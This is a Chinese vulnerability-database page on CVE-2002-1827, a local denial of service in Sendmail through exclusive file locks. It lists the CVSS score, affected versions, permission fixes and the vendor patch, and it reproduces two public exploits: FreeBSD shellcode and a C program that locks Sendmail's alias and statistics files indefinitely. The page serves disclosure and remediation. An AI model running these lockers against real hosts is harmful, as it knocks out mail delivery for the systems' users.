CVE-2002-1827
CVSS2.1
发布时间 :2002-12-31 00:00:00
修订时间 :2008-09-05 16:31:37
NMCOE    

[原文]Sendmail 8.9.0 through 8.12.3 allows local users to cause a denial of service by obtaining an exclusive lock on the (1) alias, (2) map, (3) statistics, and (4) pid files.


[CNNVD]Sendmail文件锁住机制拒绝服务攻击漏洞(CNNVD-200212-826)

        
        Sendmail是一款流行的免费开放源代码的邮件传输客户端,可运行在多种Unix和Linux操作系统下。
        Sendmail在处理文件锁住的操作上存在漏洞,可导致本地攻击者进行拒绝服务攻击。
        flock()函数可以对一个打开用来读取的文件加锁。fcntl()函数用来对一个打开写入的文件加锁,这样可以提供更好的保护。当一个进程对一个文件加锁以后,其它的进程将不能操作此文件。正常情况下程序对文件操作用那两个函数加锁,完成会后释放,如果攻击者程序构建恶意程序对sendmail相关文件一直加上锁而不释放,就可造成对sendmail程序或者相关程序操作不正常。
        

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:sendmail:sendmail:8.11.2Sendmail Sendmail 8.11.2
cpe:/a:sendmail:sendmail:8.11.6Sendmail Sendmail 8.11.6
cpe:/a:sendmail:sendmail:8.9.2Sendmail Sendmail 8.9.2
cpe:/a:sendmail:sendmail:8.10.1Sendmail Sendmail 8.10.1
cpe:/a:sendmail:sendmail:8.11.1Sendmail Sendmail 8.11.1
cpe:/a:sendmail:sendmail:8.12:beta12Sendmail Sendmail 8.12 Beta12
cpe:/a:sendmail:sendmail:8.12:beta16Sendmail Sendmail 8.12 Beta16
cpe:/a:sendmail:sendmail:8.9.3Sendmail Sendmail 8.9.3
cpe:/a:sendmail:sendmail:8.12:beta5Sendmail Sendmail 8.12 Beta5
cpe:/a:sendmail:sendmail:8.11.3Sendmail Sendmail 8.11.3
cpe:/a:sendmail:sendmail:8.12.1Sendmail Sendmail 8.12.1
cpe:/a:sendmail:sendmail:8.9.1Sendmail Sendmail 8.9.1
cpe:/a:sendmail:sendmail:8.12:beta7Sendmail Sendmail 8.12 beta7
cpe:/a:sendmail:sendmail:8.12.0Sendmail Sendmail 8.12.0
cpe:/a:sendmail:sendmail:8.12:beta10Sendmail Sendmail 8.12 Beta10
cpe:/a:sendmail:sendmail:8.12.3Sendmail Sendmail 8.12.3
cpe:/a:sendmail:sendmail:8.12.2Sendmail Sendmail 8.12.2
cpe:/a:sendmail:sendmail:8.9.0Sendmail Sendmail 8.9.0
cpe:/a:sendmail:sendmail:8.11.5Sendmail Sendmail 8.11.5
cpe:/a:sendmail:sendmail:8.11.0Sendmail Sendmail 8.11
cpe:/a:sendmail:sendmail:8.10Sendmail Sendmail 8.10
cpe:/a:sendmail:sendmail:8.10.2Sendmail Sendmail 8.10.2
cpe:/a:sendmail:sendmail:8.11.4Sendmail Sendmail 8.11.4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1827
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1827
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-826
(官方数据源) CNNVD

- 其它链接及资源

http://www.sendmail.org/LockingAdvisory.txt
(VENDOR_ADVISORY)  CONFIRM  http://www.sendmail.org/LockingAdvisory.txt
http://www.securityfocus.com/bid/4822
(UNKNOWN)  BID  4822
http://www.iss.net/security_center/static/9162.php
(UNKNOWN)  XF  sendmail-file-locking-dos(9162)

- 漏洞信息

Sendmail文件锁住机制拒绝服务攻击漏洞
低危 其他
2002-12-31 00:00:00 2005-10-20 00:00:00
本地  
        
        Sendmail是一款流行的免费开放源代码的邮件传输客户端,可运行在多种Unix和Linux操作系统下。
        Sendmail在处理文件锁住的操作上存在漏洞,可导致本地攻击者进行拒绝服务攻击。
        flock()函数可以对一个打开用来读取的文件加锁。fcntl()函数用来对一个打开写入的文件加锁,这样可以提供更好的保护。当一个进程对一个文件加锁以后,其它的进程将不能操作此文件。正常情况下程序对文件操作用那两个函数加锁,完成会后释放,如果攻击者程序构建恶意程序对sendmail相关文件一直加上锁而不释放,就可造成对sendmail程序或者相关程序操作不正常。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 建议改变sendmail相关文件的权限方式根本上未授权用户访问:
         chmod 0640 /etc/mail/aliases /etc/mail/aliases.{db,pag,dir}
         chmod 0640 /etc/mail/*.{db,pag,dir}
         chmod 0640 /etc/mail/statistics /var/log/sendmail.st
         chmod 0600 /var/run/sendmail.pid /etc/mail/sendmail.pid
        厂商补丁:
        Sendmail Consortium
        -------------------
        Sendmail开发组将在8.12.4版本中修正此问题:
        
        http://www.sendmail.org

- 漏洞信息 (21476)

Sendmail 8.9.x/8.10.x/8.11.x/8.12.x File Locking Denial Of Service Vulnerability (1) (EDBID:21476)
linux dos
2002-05-24 Verified
0 zillion
N/A [点击下载]
source: http://www.securityfocus.com/bid/4822/info

Sendmail is a MTA for Unix and Linux variants.

There is a vulnerability in Sendmail that will lead to a denial of service condition. The vulnerability occurs when a malicious user acquires an exclusive lock on files that Sendmail requires for operation. 

/*

FreeBSD Sendmail DoS shellcode that locks /etc/mail/aliases.db
Written by zillion (at http://www.safemode.org && http://www.snosoft.com)

More info: http://www.sendmail.org/LockingAdvisory.txt

*/

char shellcode[] =
        "\xeb\x1a\x5e\x31\xc0\x88\x46\x14\x50\x56\xb0\x05\x50\xcd\x80"
        "\x6a\x02\x50\xb0\x83\x50\xcd\x80\x80\xe9\x03\x78\xfe\xe8\xe1"
        "\xff\xff\xff\x2f\x65\x74\x63\x2f\x6d\x61\x69\x6c\x2f\x61\x6c"
        "\x69\x61\x73\x65\x73\x2e\x64\x62";

int main()
{

  int *ret;
  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;
}


		

- 漏洞信息 (21477)

Sendmail 8.9.x/8.10.x/8.11.x/8.12.x File Locking Denial Of Service Vulnerability (2) (EDBID:21477)
linux dos
2002-05-24 Verified
0 zillion
N/A [点击下载]
source: http://www.securityfocus.com/bid/4822/info
 
Sendmail is a MTA for Unix and Linux variants.
 
There is a vulnerability in Sendmail that will lead to a denial of service condition. The vulnerability occurs when a malicious user acquires an exclusive lock on files that Sendmail requires for operation. 

#include <fcntl.h>
#include <unistd.h>

/*

Stupid piece of code to test the sendmail lock vulnerability on
FreeBSD. Run this and try sendmail -t on FreeBSD for example.

More info: http://www.sendmail.org/LockingAdvisory.txt

zillion (at safemode.org && snosoft.com)
http://www.safemode.org
http://www.snosoft.com

*/

int main() {

  if(fork() == 0) {

    char *lock1 = "/etc/mail/aliases";
    char *lock2 = "/etc/mail/aliases.db";
    char *lock3 = "/var/log/sendmail.st";

    int fd;
    fd = open(lock1,O_RDONLY);
    flock(fd,0x02);

    fd = open(lock2,O_RDONLY);
    flock(fd,0x02);

    fd = open(lock3,O_RDONLY);
    flock(fd,0x02);

    /* We are here to stay! */

    for(;;) {}

  }
}

		

- 漏洞信息

59769
Sendmail Multiple Configuration File Lock Local DoS
Local Access Required Denial of Service
Loss of Availability
Exploit Public Vendor Verified

- 漏洞描述

Unknown or Incomplete

- 时间线

2002-05-24 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站